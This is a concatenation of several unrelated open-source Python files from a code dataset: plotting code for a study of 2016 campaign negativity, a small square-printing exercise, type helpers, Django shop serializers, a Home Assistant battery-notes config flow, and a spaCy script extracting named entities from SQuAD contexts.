presidents.set_facecolor('none')\n\n colorTrump = (0.8392156862745098, 0.15294117647058825, 0.1568627450980392, 0.4)\n colorObama = (0.05, 0.48, 1, 0.75)\n presidents.fill_between(mdates.date2num(dates), np.zeros(len(dates)),\n np.asarray(shares.trump / shares.total, dtype=float), color=colorTrump,\n step='mid', zorder=0)\n presidents.fill_between(mdates.date2num(dates), np.asarray(shares.trump / shares.total, dtype=float),\n np.ones(len(dates)), color=colorObama, step='mid', zorder=0)\n\n for election in PRESIDENTIAL_ELECTIONS:\n left.axvline(x=election, linewidth=2, c='black', linestyle='dotted', zorder=1, alpha=.3)\n electionLines = Line2D([0], [0], linewidth=2, c='black', linestyle='dotted', alpha=.3)\n backgroundColors = MulticolorPatch([colorTrump, colorObama])\n handles, labels = left.get_legend_handles_labels()\n left.get_legend().remove()\n left.legend(handles=handles + [electionLines, backgroundColors],\n labels=labels + ['Presidential elections', 'Trump/Obama quote share'],\n loc='upper left',\n handler_map={MulticolorPatch: MulticolorPatchHandler()})\n\n # Right plot\n settings = dict(ci=False, lin_reg=False, annotate=False, visuals=False,\n ylabel='Negative emotion (pre-campaign z-scores)', color=STYLES['liwc_Negemo']['color'],\n includeElections=False, s=50)\n quoteAggregationRDD.plot('liwc_Negemo', right, **settings)\n\n # Slope and Intercepts\n t_thresh = mdates.date2num(KINK)\n alpha_0_val = quoteAggregationRDD.rdd['liwc_Negemo']['Intercept']\n alpha_val = quoteAggregationRDD.rdd['liwc_Negemo']['C(threshold)[T.1]']\n beta_0_val = quoteAggregationRDD.rdd['liwc_Negemo']['time_delta']\n beta_val = quoteAggregationRDD.rdd['liwc_Negemo']['C(threshold)[T.1]:time_delta']\n alpha_0 = dict(x=t_thresh + 300, y=0, dx=0, dy=alpha_0_val, color='green')\n alpha_0_styling = dict(text=r'intercept $\\mathbf{\\alpha_0}$', fraction_dy=.5, x=t_thresh + 330, align='left')\n alpha = dict(x=t_thresh, y=alpha_0_val, dx=0, dy=alpha_val, color=(1, .65, 0))\n alpha_styling = dict(text=r'campaign offset $\\mathbf{\\alpha}$', fraction_dy=.9, x=t_thresh - 60, align='right')\n\n def reverseDirection(d):\n ret = deepcopy(d)\n ret['x'] = d['x'] + d['dx']\n ret['dx'] = - d['dx']\n ret['y'] = d['y'] + d['dy']\n ret['dy'] = - d['dy']\n d['linewidth'] = 0\n return ret\n\n arrowStyle = dict(length_includes_head=True, linewidth=3, head_width=75, head_length=0.2, joinstyle='bevel', zorder=2)\n right.hlines([0, alpha_0['dy']], [t_thresh, t_thresh], [t_thresh + 300, t_thresh + 300], colors='black', linewidth=2)\n for style, param in zip([alpha_0_styling, alpha_styling], [alpha_0, alpha]):\n name = style['text']\n right.arrow(**param, **arrowStyle)\n # right.arrow(**reverseDirection(param), **arrowStyle)\n right.text(style['x'], param['y'] + style['fraction_dy'] * param['dy'], name, color=param['color'],\n ha=style['align'], va='center', fontsize=FONTSIZE + 2, fontweight='bold')\n\n def x_at(delta: int) -> int:\n deltaFromZero = delta + quoteAggregationRDD.rdd['liwc_Negemo']['split_0']\n return mdates.date2num(quoteAggregationRDD._get_approx_date(deltaFromZero))\n\n def y_at(delta: int) -> float:\n if delta < 0:\n return alpha_0_val + beta_0_val * delta\n else:\n return alpha_0_val + alpha_val + (beta_val + beta_0_val) * delta\n\n patchColor = (0.1, 0.4, 1, 0.4)\n beta_0 = dict(x1=-65, x2=-45, text=r'slope $\\mathbf{\\beta_0}$', y_offset=0.1)\n beta = dict(x2=20, x1=55, text=r'slope $\\mathbf{\\beta_0 + \\beta}$', y_offset=0.2)\n patches = []\n for param in [beta_0, beta]:\n x1 = x_at(param['x1'])\n y1 = y_at(param['x1'])\n x2 = x_at(param['x2'])\n y2 = y_at(param['x2'])\n edges = np.array([[x1, y1], [x2, y1], [x2, y2]])\n x_text = x1 + 0.5 * (x2 - x1)\n y_text = max(y1, y2) + param['y_offset']\n right.text(x_text, y_text, param['text'], color=patchColor[:3], ha='center', va='bottom', fontsize=FONTSIZE + 2, fontweight='bold')\n patches.append(Polygon(xy=edges, fill=True, zorder=2))\n\n col = PatchCollection(patches, facecolors=patchColor)\n right.add_collection(col)\n\n equation = r\"$y_t = \\mathbf{\\alpha_0} + \\mathbf{\\beta_0} \\,t + \\mathbf{\\alpha} \\,i_{t} + \\mathbf{\\beta} \\,i_{t} \\,t + \\varepsilon_{t}$\"\n box_props = dict(boxstyle='round', facecolor='white', alpha=.5, ec='none')\n right.text(0.5, 0.85, equation, transform=right.transAxes, fontsize=FONTSIZE + 2, verticalalignment='bottom', horizontalalignment='center', bbox=box_props)\n\n old_ylim = right.get_ylim()\n right.scatter(mdates.date2num(KINK), old_ylim[0], s=100, marker='X', color='tab:red', clip_on=False, zorder=100)\n right.set_ylim(old_ylim) # Prevent that scatter above moves the limit around\n right.text(mdates.date2num(KINK) + 50, right.get_ylim()[0] + 0.15, '$t = 0$ (June 2015)', fontsize=FONTSIZE, color='tab:red')\n\n right.set_xlim(*mdates.date2num([min(dates)]), *mdates.date2num([max(dates)]))\n right.axhline(y=0, linestyle='--', color='black', linewidth=0.8, zorder=0)\n plt.tight_layout()\n\n # saveFigure(fig, folder.joinpath('Fig0.pdf'))\n # left_extend = left.get_window_extent().transformed(fig.dpi_scale_trans.inverted()).expanded(1.1, 1.1)\n # saveFigure(fig, folder.joinpath('Title_figure_left.pdf'), bbox_inches=left_extend)\n # right_extend = right.get_window_extent().transformed(fig.dpi_scale_trans.inverted()).expanded(1.1, 1.2)\n # saveFigure(fig, folder.joinpath('Title_figure_right.pdf'), bbox_inches=right_extend)\n plt.close()\n\n\ndef SI_additionals(data: Path, SI: Path):\n \"\"\"Assumes the default file structure is kept\"\"\"\n # Aggregations with and without Outliers\n print('Aggregations with and without outliers')\n fig, axs = plt.subplots(ncols=7, nrows=4, figsize=LANDSCAPE_FIGSIZE, sharey='all')\n plt.subplots_adjust(wspace=.04, hspace=.6, bottom=.3)\n QA = pickle.load(data.joinpath('QuotationAggregation_RDD.pickle').open('rb'))\n QA_out = pickle.load(data.joinpath('QuotationAggregation_RDD_outliers.pickle').open('rb'))\n SA = pickle.load(data.joinpath('SpeakerAggregation_RDD.pickle').open('rb'))\n SA_out = pickle.load(data.joinpath('SpeakerAggregation_RDD_outliers.pickle').open('rb'))\n\n grid({'': QA}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[0], prefix=string.ascii_uppercase)\n grid({'': QA_out}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False, ylabel='Pre-campaign z-scores', axs=axs[1],\n prefix=string.ascii_lowercase)\n grid({'': SA}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False, ylabel='Pre-campaign z-scores', axs=axs[2],\n prefix=string.ascii_uppercase[7:])\n grid({'': SA_out}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False, ylabel='Pre-campaign z-scores', axs=axs[3],\n prefix=string.ascii_lowercase[7:])\n\n txt = ['Quote-level aggregation', 'Quote-level aggregation, outliers removed', 'Speaker-level aggregation', 'Speaker-level aggregation, outliers removed']\n for i, row in enumerate(axs):\n for j, ax in enumerate(row):\n ax.set_ylim([-5, 6])\n if j == 3:\n ax.text(0.5, 1.2, txt[i], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n transform=ax.transAxes)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n saveFigure(fig, SI.joinpath('ALL_AGG.pdf'), excludeTightLayout=True)\n\n # Scatters Only\n print('Scatter only including empath')\n fig, axs = plt.subplots(ncols=7, nrows=2, figsize=LANDSCAPE_NARROW_FIGSIZE, sharey='all')\n plt.subplots_adjust(wspace=.04, hspace=.6, bottom=.3)\n\n scatter_grid(1, 7, QA, SI_FEATURES, axs=axs[0], fontsize=FONTSIZE-2)\n scatter_grid(1, 7, SA, SI_FEATURES, axs=axs[1], prefix=string.ascii_lowercase[7:], fontsize=FONTSIZE-2)\n\n txt = ['Quote-level aggregation', 'Speaker-level aggregation']\n for i, row in enumerate(axs):\n for j, ax in enumerate(row):\n # ax.set_ylim([-7, 7])\n if j == 3:\n ax.text(0.5, 1.2, txt[i], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n transform=ax.transAxes)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n saveFigure(fig, SI.joinpath('Negativity_Scatter.pdf'), excludeTightLayout=True)\n\n # All Individuals\n print('Individuals Grid SI')\n fig, axs = plt.subplots(nrows=5, ncols=6, figsize=[LANDSCAPE_FIGSIZE[0], LANDSCAPE_FIGSIZE[1] * 1.1], sharey='all')\n name2qid = {val: key for key, val in POLITICIAN_IDS.items()}\n plt.subplots_adjust(wspace=.04, hspace=.55, bottom=.3)\n Obama = pickle.load(data.joinpath('Individuals').joinpath(name2qid['Barack Obama'] + '_RDD.pickle').open('rb'))\n Trump = pickle.load(data.joinpath('Individuals').joinpath(name2qid['Donald Trump'] + '_RDD.pickle').open('rb'))\n Biden = pickle.load(data.joinpath('Individuals').joinpath(name2qid['Joe Biden'] + '_RDD.pickle').open('rb'))\n Romney = pickle.load(data.joinpath('Individuals').joinpath(name2qid['Mitt Romney'] + '_RDD.pickle').open('rb'))\n Pence = pickle.load(data.joinpath('Individuals').joinpath(name2qid['Mike Pence'] + '_RDD.pickle').open('rb'))\n Clinton = pickle.load(data.joinpath('Individuals').joinpath(name2qid['Hillary Clinton'] + '_RDD.pickle').open('rb'))\n\n grid({'': Biden}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 0], prefix=string.ascii_lowercase, y_param=0.95)\n grid({'': Clinton}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 1], prefix=string.ascii_lowercase[5:], y_param=0.95)\n grid({'': Obama}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 2], prefix=string.ascii_lowercase[10:], y_param=0.95)\n grid({'': Pence}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 3], prefix=string.ascii_lowercase[15:], y_param=0.95)\n grid({'': Romney}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 4], prefix=string.ascii_lowercase[20:], y_param=0.95)\n grid({'': Trump}, 1, 5, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[:, 5], prefix=string.ascii_lowercase[25:] + string.ascii_uppercase, y_param=0.95)\n\n txt = ['Joe Biden', 'Hillary Clinton', 'Barack Obama', 'Mike Pence', 'Mitt Romney', 'Donald Trump']\n for i, row in enumerate(axs):\n for j, ax in enumerate(row):\n ax.set_ylim([-15, 35])\n if i == 0:\n ax.text(0.5, 1.24, txt[j], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n transform=ax.transAxes)\n if j != 0:\n ax.tick_params(axis='y', which='both', left=False, right=False)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n saveFigure(fig, SI.joinpath('Individuals_Grid.pdf'), excludeTightLayout=True)\n plt.close('all')\n\n # Party Empath controls + Republicans Without Trump\n print('Party, but with empath')\n democrats = pickle.load(data.joinpath('parties').joinpath('PartyAggregation_RDD_democrats.pickle').open('rb'))\n republicans = pickle.load(data.joinpath('parties').joinpath('PartyAggregation_RDD_republicans.pickle').open('rb'))\n wot = pickle.load(data.joinpath('PartyAggregationWithoutTrump_RDD_republicans.pickle').open('rb'))\n\n fig, axs = plt.subplots(ncols=7, nrows=3, figsize=[LANDSCAPE_FIGSIZE[0], LANDSCAPE_FIGSIZE[1] * .5], sharey='all')\n plt.subplots_adjust(wspace=.04, hspace=.55, bottom=.3)\n grid({'': democrats}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[0], prefix=string.ascii_uppercase)\n grid({'': republicans}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[1], prefix=string.ascii_lowercase[7:])\n grid({'': wot}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[2], prefix=string.ascii_lowercase[14:])\n\n txt = ['Democrats', 'Republicans', 'Republicans without Donald Trump']\n for i, row in enumerate(axs):\n for j, ax in enumerate(row):\n # ax.set_ylim([-5, 6])\n if j == 3:\n ax.text(0.5, 1.2, txt[i], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n transform=ax.transAxes)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n saveFigure(fig, SI.joinpath('Party_all'))\n\n\ndef main():\n args = parser.parse_args()\n data = Path(args.rdd)\n img = Path(args.img)\n\n # Map a file or folder name to a plotting utility.\n NAME_2_FUNCTION = {\n 'verbosity': verbosity_plots,\n 'parties': party_plots,\n 'YouGov_sources_RDD': basic_model_plots,\n 'Individuals': individuals,\n 'Without': ablation_plots,\n 'QuotationAggregation_RDD': basic_model_plots,\n 'QuotationAggregation_RDD_outliers': outlier_plots,\n 'SpeakerAggregation_RDD': basic_model_plots,\n 'SpeakerAggregationSanity_RDD': basic_model_plots,\n 'SpeakerAggregation_RDD_outliers': outlier_plots,\n 'AttributesAggregation_RDD': attribute_plots,\n 'AttributesAggregationSpeakerLevel_RDD': attribute_plots,\n 'RDD_time_variation': RDD_kink_performance,\n 'RDD_time_variation_YouGov': RDD_kink_performance,\n 'PartyAggregationWithoutTrump': basic_model_plots,\n 'PartyAggregationWithoutTrump_RDD_democrats': basic_model_plots,\n 'PartyAggregationWithoutTrump_RDD_republicans': basic_model_plots\n }\n\n paths = {\n 'QuotationAggregation_RDD': None,\n 'SpeakerAggregation_RDD': None,\n 'democrats': None,\n 'republicans': None\n }\n for path in data.iterdir():\n if path.name.endswith('tex'):\n continue\n\n if not path.name.startswith('YouGov') or path.name.startswith('QuotationAggregation'):\n continue\n\n base_name = path.name.split('.')[0]\n if base_name in paths:\n paths[base_name] = path\n elif base_name == 'parties':\n paths['democrats'] = path.joinpath('PartyAggregation_RDD_democrats.pickle')\n paths['republicans'] = path.joinpath('PartyAggregation_RDD_republicans.pickle')\n if base_name not in NAME_2_FUNCTION:\n continue\n\n print(base_name)\n base_folder = img.joinpath(base_name)\n plot = NAME_2_FUNCTION[base_name]\n plot(path, base_folder)\n\n if args.SI is not None:\n print('SI plots')\n si_data = Path(args.SI)\n si_img = img.joinpath('SI')\n si_img.mkdir(exist_ok=True)\n quant = si_data.joinpath('quantitative_statisticts.csv')\n plot_quantities(quant, si_img)\n SI_additionals(data, si_img)\n\n if all(p is not None for p in paths.values()):\n models = {key: pickle.load(paths[key].open('rb')) for key in paths}\n aggregation_overview(**models, folder=img)\n\n # Build \"Fig. 0\"\n if 'QuotationAggregation_RDD' in paths:\n aggregates = data.parent.joinpath('aggregates')\n presidents = pd.read_csv(\n aggregates.joinpath('presidents.csv').open('r')) # Contains Obamas and Trumps number of Quotes\n negemo = pd.read_csv(aggregates.joinpath('QuotationAggregation.csv').open('r'))[['liwc_Negemo', 'date']]\n negemo['liwc_Negemo'] = negemo['liwc_Negemo'] \\\n * pickle.load(aggregates.joinpath('std.pickle').open('rb'))['liwc_Negemo'] \\\n + pickle.load(aggregates.joinpath('mean.pickle').open('rb'))[\n 'liwc_Negemo'] # Restore the original liwc scores\n title_figure(presidents, negemo, pickle.load(paths['QuotationAggregation_RDD'].open('rb')), img)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"epfl-dlab/Negativity_in_2016_campaign","sub_path":"analysis/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":67438,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"22011230970","text":"#!/usr/bin/python3\n\n\n\"\"\" Module to manage square draw\n>>> print_square(2)\n##\n##\n\"\"\"\n\n\ndef print_square(size):\n \"\"\" Print a square of side size\n size must be an integer\n if size is not integer TypeError will be raised\n if size > 0 , valuerror will be raised\n \"\"\"\n if not isinstance(size, int):\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n if size == 0:\n return\n print(\"\\n\" . join([\"\" . join([\n (\"#\" * size)\n ])] * size))\n","repo_name":"afissama/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/4-print_square.py","file_name":"4-print_square.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37009492744","text":"import types\nfrom array import array\nfrom mmap import mmap\nfrom pickle import PickleBuffer\nfrom types import UnionType\nfrom typing import TYPE_CHECKING, Any, Protocol, TypeVar, Union\nfrom typing import _AnnotatedAlias as TypingAnnotatedAlias # type: ignore\nfrom typing import _GenericAlias as TypingGenericAlias # type: ignore\nfrom typing import _LiteralGenericAlias as LiteralGenericAlias # type: ignore\nfrom typing import _UnionGenericAlias as UnionGenericAlias # type: ignore\nfrom typing import runtime_checkable\n\nif TYPE_CHECKING:\n from ctypes import _CData as CData # type: ignore\n\n\n__all__ = [\n \"AnnotatedAlias\",\n \"Dataclass\",\n \"Descriptor\",\n \"GenericAlias\",\n \"LiteralAlias\",\n \"ReadableBuffer\",\n \"SupportsTrunc\",\n \"UnionAlias\",\n]\n\n\nT_co = TypeVar(\"T_co\", covariant=True)\n\n\nclass SupportsTrunc(Protocol):\n def __trunc__(self) -> int:\n ...\n\n\n@runtime_checkable\nclass Descriptor(Protocol[T_co]):\n def __get__(self, instance: object, owner: type | None = ...) -> T_co:\n ...\n\n\nReadOnlyBuffer = bytes\n\n\nWritableBuffer = Union[bytearray, memoryview, \"array[Any]\", mmap, \"CData\", PickleBuffer]\n\n\nReadableBuffer = ReadOnlyBuffer | WritableBuffer\n\n\nDataclass = Any\n\n\nif TYPE_CHECKING:\n GenericAlias = Any\nelse:\n GenericAlias = TypingGenericAlias | types.GenericAlias\n\n\nif TYPE_CHECKING:\n UnionAlias = UnionType\nelse:\n UnionAlias = UnionGenericAlias | UnionType\n\n\nif TYPE_CHECKING:\n LiteralAlias = UnionType\nelse:\n LiteralAlias = LiteralGenericAlias\n\n\nif TYPE_CHECKING:\n AnnotatedAlias = UnionType\nelse:\n AnnotatedAlias = TypingAnnotatedAlias\n","repo_name":"LeeeeT/valtypes","sub_path":"valtypes/typing.py","file_name":"typing.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"70721443413","text":"from rest_framework import serializers\nfrom apps.products.models import *\nfrom apps.accounts.models import CustomUser\n\n\nclass ProductImagesSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProductImages\n fields = ['id', 'images']\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n color = serializers.StringRelatedField(many=True)\n size = serializers.StringRelatedField(many=True)\n product_images = ProductImagesSerializer(many=True, read_only=True)\n\n category = serializers.StringRelatedField(read_only=True)\n collection = serializers.StringRelatedField(read_only=True)\n\n class Meta:\n model = Product\n fields = ['id', 'collection', 'category',\n 'name', 'model', 'made_of_type',\n 'color', 'size', 'price', 'image',\n 'product_images', 'available_inventory',\n 'description'\n ]\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n category_products = ProductSerializer(many=True)\n\n class Meta:\n model = Category\n fields = ['name', 'image', 'category_products']\n\n\nclass CollectionSerializer(serializers.ModelSerializer):\n collection_products = ProductSerializer(many=True, read_only=True)\n\n class Meta:\n model = Collection\n fields = ['title', 'collection_products']\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = CustomUser\n fields = ['username']\n\n\nclass CartItemSerializer(serializers.ModelSerializer):\n product = serializers.StringRelatedField(required=False)\n\n class Meta:\n model = CartItem\n fields = (\n 'id',\n 'product',\n 'quantity',\n 'get_total_price'\n )\n\n\nclass CartSerializer(serializers.ModelSerializer):\n items = CartItemSerializer(many=True)\n customer = UserSerializer(required=False, read_only=True)\n\n class Meta:\n model = Cart\n fields = (\n 'created_at', 'updated_at', 'items',\n 'get_cart_total_count', 'get_cart_total_price',\n 'calculated_total_discount', \"customer\"\n )\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n customer = UserSerializer(read_only=True)\n\n class Meta:\n model = Order\n fields = (\n 'transaction_id', 'cart', 'customer',\n 'order_type', 'order_number',\n 'created_at', 'updated_at',\n )\n extra_kwargs = {\n 'transaction_id': {\"read_only\": True},\n 'cart': {\"required\": False},\n 'customer': {\"required\": False},\n }\n","repo_name":"ZBegzod/OnlineShopV2","sub_path":"apps/products/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"29361036888","text":"\"\"\"Adds config flow for BatteryNotes.\"\"\"\nfrom __future__ import annotations\n\nimport copy\nimport logging\n\nfrom typing import Any\n\nimport voluptuous as vol\nfrom homeassistant import config_entries\nfrom homeassistant.core import callback\nfrom homeassistant.data_entry_flow import FlowResult\nfrom homeassistant.config_entries import ConfigEntry, OptionsFlow\nfrom homeassistant.helpers import selector\nfrom homeassistant.helpers.typing import DiscoveryInfoType\n\nimport homeassistant.helpers.device_registry as dr\n\nfrom homeassistant.const import (\n CONF_NAME,\n CONF_DEVICE_ID,\n)\n\nfrom .library import Library\n\nfrom .const import (\n DOMAIN,\n CONF_BATTERY_TYPE,\n CONF_DEVICE_NAME,\n CONF_MANUFACTURER,\n CONF_MODEL,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nDEVICE_SCHEMA = vol.Schema(\n {\n vol.Required(CONF_DEVICE_ID): selector.DeviceSelector(\n # selector.DeviceSelectorConfig(model=\"otgw-nodo\")\n ),\n vol.Optional(CONF_NAME): selector.TextSelector(\n selector.TextSelectorConfig(type=selector.TextSelectorType.TEXT),\n ),\n }\n)\n\n\nclass BatteryNotesFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):\n \"\"\"Config flow for BatteryNotes.\"\"\"\n\n VERSION = 1\n\n data: dict\n\n @staticmethod\n @callback\n def async_get_options_flow(config_entry: ConfigEntry) -> OptionsFlow:\n \"\"\"Get the options flow for this handler.\"\"\"\n return OptionsFlowHandler(config_entry)\n\n async def async_step_integration_discovery(\n self,\n discovery_info: DiscoveryInfoType,\n ) -> FlowResult:\n \"\"\"Handle integration discovery.\"\"\"\n _LOGGER.debug(\"Starting discovery flow: %s\", discovery_info)\n\n self.context[\"title_placeholders\"] = {\n \"name\": discovery_info[CONF_DEVICE_NAME],\n \"manufacturer\": discovery_info[CONF_MANUFACTURER],\n \"model\": discovery_info[CONF_MODEL],\n }\n\n return await self.async_step_user(discovery_info)\n\n async def async_step_user(\n self,\n user_input: dict | None = None,\n ) -> config_entries.FlowResult:\n \"\"\"Handle a flow initialized by the user.\"\"\"\n _errors = {}\n if user_input is not None:\n self.data = user_input\n\n device_id = user_input[CONF_DEVICE_ID]\n\n device_registry = dr.async_get(self.hass)\n device_entry = device_registry.async_get(device_id)\n\n _LOGGER.debug(\n \"Looking up device %s %s\", device_entry.manufacturer, device_entry.model\n )\n\n library = Library.factory(self.hass)\n\n device_battery_details = await library.get_device_battery_details(\n device_entry.manufacturer, device_entry.model\n )\n\n if device_battery_details:\n _LOGGER.debug(\n \"Found device %s %s\", device_entry.manufacturer, device_entry.model\n )\n self.data[\n CONF_BATTERY_TYPE\n ] = device_battery_details.battery_type_and_quantity\n\n return await self.async_step_battery()\n\n return self.async_show_form(\n step_id=\"user\",\n data_schema=DEVICE_SCHEMA,\n errors=_errors,\n last_step=False,\n )\n\n async def async_step_battery(self, user_input: dict[str, Any] | None = None):\n \"\"\"Second step in config flow to add the battery type.\"\"\"\n errors: dict[str, str] = {}\n if user_input is not None:\n self.data[CONF_BATTERY_TYPE] = user_input[CONF_BATTERY_TYPE]\n\n device_id = self.data[CONF_DEVICE_ID]\n unique_id = f\"bn_{device_id}\"\n\n device_registry = dr.async_get(self.hass)\n device_entry = device_registry.async_get(device_id)\n\n await self.async_set_unique_id(unique_id)\n self._abort_if_unique_id_configured()\n\n if CONF_NAME in self.data:\n title = self.data.get(CONF_NAME)\n else:\n title = device_entry.name_by_user or device_entry.name\n\n return self.async_create_entry(\n title=title,\n data=self.data,\n )\n\n return self.async_show_form(\n step_id=\"battery\",\n data_schema=vol.Schema(\n {\n vol.Required(\n CONF_BATTERY_TYPE,\n default=self.data.get(CONF_BATTERY_TYPE),\n ): selector.TextSelector(\n selector.TextSelectorConfig(\n type=selector.TextSelectorType.TEXT\n ),\n ),\n }\n ),\n errors=errors,\n )\n\n\nclass OptionsFlowHandler(OptionsFlow):\n \"\"\"Handle an option flow for BatteryNotes.\"\"\"\n\n def __init__(self, config_entry: ConfigEntry) -> None:\n \"\"\"Initialize options flow.\"\"\"\n self.config_entry = config_entry\n self.current_config: dict = dict(config_entry.data)\n self.source_device_id: str = self.current_config.get(CONF_DEVICE_ID) # type: ignore\n self.name: str = self.current_config.get(CONF_NAME)\n self.battery_type: str = self.current_config.get(CONF_BATTERY_TYPE)\n\n async def async_step_init(\n self,\n user_input: dict[str, Any] | None = None,\n ) -> FlowResult:\n \"\"\"Handle options flow.\"\"\"\n errors = {}\n self.current_config = dict(self.config_entry.data)\n\n schema = self.build_options_schema()\n if user_input is not None:\n errors = await self.save_options(user_input, schema)\n if not errors:\n return self.async_create_entry(title=\"\", data={})\n\n return self.async_show_form(\n step_id=\"init\",\n data_schema=schema,\n errors=errors,\n )\n\n async def save_options(\n self,\n user_input: dict[str, Any],\n schema: vol.Schema,\n ) -> dict:\n \"\"\"Save options, and return errors when validation fails.\"\"\"\n device_registry = dr.async_get(self.hass)\n device_entry = device_registry.async_get(\n self.config_entry.data.get(CONF_DEVICE_ID)\n )\n\n if CONF_NAME in user_input:\n title = user_input.get(CONF_NAME)\n else:\n title = device_entry.name_by_user or device_entry.name\n\n self._process_user_input(user_input, schema)\n self.hass.config_entries.async_update_entry(\n self.config_entry,\n title=title,\n data=self.current_config,\n )\n return {}\n\n def _process_user_input(\n self,\n user_input: dict[str, Any],\n schema: vol.Schema,\n ) -> None:\n \"\"\"Process the provided user input against the schema.\"\"\"\n for key in schema.schema:\n if isinstance(key, vol.Marker):\n key = key.schema\n if key in user_input:\n self.current_config[key] = user_input.get(key)\n elif key in self.current_config:\n self.current_config.pop(key)\n\n def build_options_schema(self) -> vol.Schema:\n \"\"\"Build the options schema.\"\"\"\n data_schema = vol.Schema(\n {\n vol.Optional(CONF_NAME): selector.TextSelector(\n selector.TextSelectorConfig(type=selector.TextSelectorType.TEXT),\n ),\n vol.Required(CONF_BATTERY_TYPE): selector.TextSelector(\n selector.TextSelectorConfig(type=selector.TextSelectorType.TEXT),\n ),\n }\n )\n\n return _fill_schema_defaults(\n data_schema,\n self.current_config,\n )\n\n\ndef _fill_schema_defaults(\n data_schema: vol.Schema,\n options: dict[str, str],\n) -> vol.Schema:\n \"\"\"Make a copy of the schema with suggested values set to saved options.\"\"\"\n schema = {}\n for key, val in data_schema.schema.items():\n new_key = key\n if key in options and isinstance(key, vol.Marker):\n if (\n isinstance(key, vol.Optional)\n and callable(key.default)\n and key.default()\n ):\n new_key = vol.Optional(key.schema, default=options.get(key)) # type: ignore\n else:\n new_key = copy.copy(key)\n new_key.description = {\"suggested_value\": options.get(key)} # type: ignore\n schema[new_key] = val\n return vol.Schema(schema)\n","repo_name":"fwartner/homeassistant-config","sub_path":"custom_components/battery_notes/config_flow.py","file_name":"config_flow.py","file_ext":"py","file_size_in_byte":8503,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"8885771016","text":"import spacy\nfrom spacy import displacy\nfrom collections import Counter\nimport en_core_web_sm\nnlp = en_core_web_sm.load()\nfrom tqdm import tqdm \nimport json\nimport sys\nimport pandas as pd\n\n\ndef read_examples(input_file):\n \"\"\"Read a SQuAD json file into a list of SquadExample.\"\"\"\n with open(input_file, \"r\", encoding='utf-8') as reader:\n input_data = json.load(reader)[\"data\"]\n\n def is_whitespace(c):\n if c == \" \" or c == \"\\t\" or c == \"\\r\" or c == \"\\n\" or ord(c) == 0x202F:\n return True\n return False\n\n examples = []\n idx=0\n for _,entry in tqdm(enumerate(input_data)):\n for paragraph in entry[\"paragraphs\"]:\n context = paragraph[\"context\"]\n k=0\n for j in nlp(context).ents:\n idx+=1\n answer=j.text\n ner=j.label_\n examples.append(\n\n {\n 'context':context,\n 'answer':answer,\n 'id':idx,\n 'ner':ner,\n 'question':''\n }\n )\n k+=1\n if k>5:\n break\n \n \n df=pd.DataFrame(examples)\n df.to_csv('../output/'+sys.argv[1]+'_ner.csv')\n \n\nif __name__=='__main__':\n file_name=sys.argv[2]\n 